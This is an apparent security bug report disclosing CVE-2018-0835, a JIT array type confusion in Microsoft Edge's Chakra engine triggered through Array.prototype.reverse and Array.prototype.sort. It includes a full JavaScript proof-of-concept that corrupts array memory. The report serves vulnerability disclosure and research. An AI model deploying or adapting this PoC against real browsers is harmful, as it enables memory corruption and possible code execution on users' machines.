Microsoft Edge: Chakra: JIT: Array type confusion via Array.prototype.reverse CVE-2018-0835 This is simillar to the previous issue 1457. But this time, we use Array.prototype.reverse. Array.prototype.reverse can be inlineed and may invoke EnsureNonNativeArray to convert the prototype of "this" to a Var array. Call flow: JavascriptArray::EntryReverse -> FillFromPrototypes -> ForEachOwnMissingArrayIndexOfObject -> EnsureNonNativeArray To make that happen, the prototype must be a native array. But this usually can't be fulfilled, since once it's set as a prototype, it gets converted to a Var array. To bypass this, we can use Array.prototype.sort. Here's a snippet of JavascriptArray::EntrySort. arr = JavascriptNativeFloatArray::ConvertToVarArray((JavascriptNativeFloatArray*)arr); JS_REENTRANT(jsReentLock, arr->Sort(compFn)); arr = arr->ConvertToNativeArrayInPlace(arr); If "this" is a native array, the "sort" method first converts it to a Var array, sorts it, and then converts it back to the original type. So by setting it as a prototype in the compare function, we can make an object that its prototype is a native array. PoC: function opt(arr, arr2) { arr2[0]; arr[0] = 1.1; arr2.reverse(); arr[0] = 2.3023e-320; } function main() { let arr = [1.1, 2.2, 3.3]; arr.__proto__ = null; // avoid inline caching delete arr[1]; // avoid doArrayMissingValueCheckHoist let arr2 = [, {}]; arr2.__proto__ = {}; arr2.reverse = Array.prototype.reverse; for (let i = 0; i < 10000; i++) { opt(arr, arr2); } Array.prototype.sort.call(arr, () => { arr2.__proto__.__proto__ = arr; }); opt(arr, arr2); print(arr[0]); } main(); This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: lokihardt